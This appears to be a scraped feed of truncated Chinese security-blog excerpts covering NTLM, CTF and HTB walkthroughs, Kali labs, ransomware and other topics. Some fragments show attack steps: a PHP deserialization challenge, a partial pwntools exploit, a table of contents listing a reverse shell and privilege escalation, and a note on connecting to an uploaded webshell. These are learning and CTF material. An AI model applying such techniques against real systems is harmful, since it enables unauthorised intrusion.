NTLM(NT LAN Manager)
NTLM协议是在Microsoft环境中使用的一种身份验证协议,它允许用户向服务器证明自己是谁(挑战(Chalenge)/响应(Response)认证机制),以便…
ARM Cortex-A,Cortex-M和Cortex-R是ARM处理器系列的不同产品线,针对不同的应用场景和要求进行了优化。以下是它们之间的主要区别:
1. 应用场景:Cortex-A系列处理器主要用于高性能计算设备,例如智能手机、平板电脑、个…
W13Scan介绍
W13scan 是基于Python3的一款开源的Web漏洞发现工具,它支持主动扫描模式和被动扫描模式,能运行在Windows、Linux、Mac上。 丰富的检测插件 使用
usage: w13scan [options]optional arguments:-h, --help show this help message and exit-…
第三届网络安全、人工智能与数字经济国际学术会议(CSAIDE 2024)
2024 3rd International Conference on Cyber Security, Artificial Intelligence and Digital Economy
第二届网络安全、人工智能与数字经济国际学术会议(CSAIDE 2023&…
ELF(Executable and Linking Format)是一种对象文件的格式,它主要用于定义ELF(Executable and Linking Format)是一种对象文件的格式,它主要用于定义不同类型的对象文件中的内容以及它们的存储方式。一个EL…
#先投稿,先送审#
第三届网络安全、人工智能与数字经济国际学术会议(CSAIDE 2024)
2024 3rd International Conference on Cyber Security, Artificial Intelligence and Digital Economy 2024年3月1日-3日 | 中国南京 会议官网:…
CISSP (Certified Information Systems Security Professional) – “(ISC)注册信息系统安全师” 认证是信息安全领域最被全球广泛认可的IT安全认证,一直以来被誉为业界的“金牌标准”。CISSP认证不仅是对个人信息安全专业知识的客观评估,也是全球公认的…
作者:nothinghappend 链接:https://zhuanlan.zhihu.com/p/669881930 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
CIA
CIA 三性:
机密性:和数据泄露有关。完整性…
前言 一、CTF简介
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的…
[NISACTF 2022]popchains wp
题目代码:
Happy New Year~ MAKE A WISH
<?phpecho Happy New Year~ MAKE A WISH<br>;if(isset($_GET[wish])){unserialize($_GET[wish]);
}
else{$anew Road_is_Long;highlight_file(__FILE__);
}
/**********************…
如何通过系统命令排查账号安全
query user 查看当前登录账号 logoff id 注销用户id net user 查看用户 net user username 查看用户登录情况 lusrmgr.msc
查看隐藏账号
winR打开regedit注册表 找到计算机\HEKY_LOCAL_MACHINE\SAM\SAM\右键给与用户读写权限 刷新打开 HKEY…
靶机简介 Windows Server 2003是微软公司于2003年3月28日发布的服务器操作系统,它基于Windows XP/Windows NT 5.1进行开发,并在同年4月底上市。以下是关于Windows Server 2003的详细介绍: 系统名称与发布历程: 该产品最初被命名为…
前言
Black Basta勒索病毒是一款2022年新型的勒索病毒,最早于2022年4月被首次曝光,主要针对Windows系统进行攻击,虽然这款新型的勒索病毒黑客组织仅仅才出来短短两个多月的时间,就已经在其暗网平台上已经公布了几十个受害者之多&…
年后开始准备EAP-TLS 802.1x认证的事情,年前搭建了Windows Server 2019预为认证服务器,参考了《在 Windows Server 上搭建 AD 域控制器 - KOBIN 技术随笔》及《Windows Server 搭建 RADIUS 认证服务器 - 知乎》及《WINDOWS SERVER 2012证书服务安装配置_…
目录 信息收集
1、arp
2、nmap
3、nikto
目录探测
gobuster
dirsearch
WEB
信息收集
get flag1
get flag2
get flag3
SQL注入
漏洞探测
脱库
get flag4
文件上传
反弹shell
提权
get flag5
get flag6 信息收集
1、arp
┌──(root㉿ru)-[~/kali]
└─# a…
一文速览深度伪造检测(Detection of Deepfakes):未来技术的守门人 前言一、Deepfakes技术原理卷积神经网络(CNN):细致的艺术学徒生成对抗网络(GAN):画家与评审的双重角色…
摘要:最近,看了下慕课2周刷完n道面试题,记录并添加部分可参考的文档,如下...
1. 移动端H5 click有300ms延迟, 如何解决?
背景:double tap to zoom 移动端H5中的300ms点击延迟问题通常是由浏览…
Perfection
User
Namp
┌──(kali㉿kali)-[~/HTB/machine/Perfection]
└─$ nmap -A 10.129.226.58
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-03 21:10 EST
Nmap scan report for 10.
目录 一、实验
1.环境
2. Kali Linux (2024.1) 使用 namp 扫描目标主机
3.Kali Linux (2024.1)远程登录 Windows Server
4.Kali Linux (2024.1) 使用crunch字典工具
5.Kali Linux (2024.1)使用hydra密码工具
6.Kali Linux (2022.3) 通过SSH端口获取 Ubuntu 密码
二、问题…
Kali Linux 2024.1刚刚发布,标志着这个备受欢迎的安全重点Linux发行版在今年的首次重大更新。以其先进的渗透测试和安全审计功能而闻名,它是安全专业人员和爱好者的首选工具。
Kali 2024.1 亮点
本次发布由 Linux 内核 6.6 提供支持,突出了…
redis安装及配置 wget http://download.redis.io/releases/redis-3.2.0.tar.gz tar xzf redis-3.2.0.tar.gz cd redis-3.2.0 make cp /root/redis-6.2.6/redis.conf /usr/local/redis/bin/ cd /usr/local/redis/bin/ vi redis.conf #修改内容如下: #protected-mode …
1、环境搭建测试
虚拟机网络环境配置,模拟外网和内网
主机操作系统网络内网ip外网ip物理主机window10vmnet8192.168.70.1攻击机kali Linuxvmnet8192.168.70.134域控主机win server 2008 r2vmnet0192.168.52.138域成员主机win server 2k3vmnet0192.168.52.141服务器…
随着信创国产化改造持续推进,越来越多的金融机构不断采购信创服务器、PC、办公软件等,其 IT 基础设施逐渐迁移至国产化 IT 架构下。为支撑国产化 IT 基础设施的正常使用和集中管理运维,某金融机构数据中心的微软Active Directory(…
1、[安洵杯 2019]easy_serialize_php 1 考点:PHP 反序列化逃逸 变量覆盖 【代码审计】
通过 GET 的方式获取参数 f 的值,传递给变量 function 定义一个过滤函数,过滤掉特定字符(用空字符替换) 下面的代码其实没什么用…
查看保护 查看ida 先放exp
完整exp:
from pwn import*
from sympy.ntheory.modular import crt
context(log_leveldebug,archamd64)while True:pprocess(./leak)ps[101,103,107,109,113,127]p.sendafter(bsecret\n,bytes(ps))cs[0]*6for i in range(6):cs[i]u32(p…
-------------------搭建CTFd------------------------------
给大家介绍一个本地搭建比较好用的CTF比赛平台:CTFD。
CTFd是一个Capture The Flag框架,侧重于易用性和可定制性。它提供了运行CTF所需的一切,并且可以使用插件和主题轻松进行自…
目录
Black web
babyrsa2
APISIX-FLOW
cloacked 本人不是很擅长ctf,这只是我自己做出的西部赛区部分题的思路,仅供参考
Black web 访问http://192.168.16.45:8000/uploads/1711779736.php
蚁剑连接
访问/var/www/html/u_c4nt_f1nd_flag.php babyr…
一、课题描述
三位同学一组完成数据的非对称加密和数字签名验证传输。 三位同学分别扮演图中 Alice、Bob 和 CA 三个角色,Bob 和 Alice 从 CA 中获得数字证书、Bob 向 Alice 发送秘密发送一段加密并签名后的信息,Alice 获取 Bob 发送的加密信息&#x…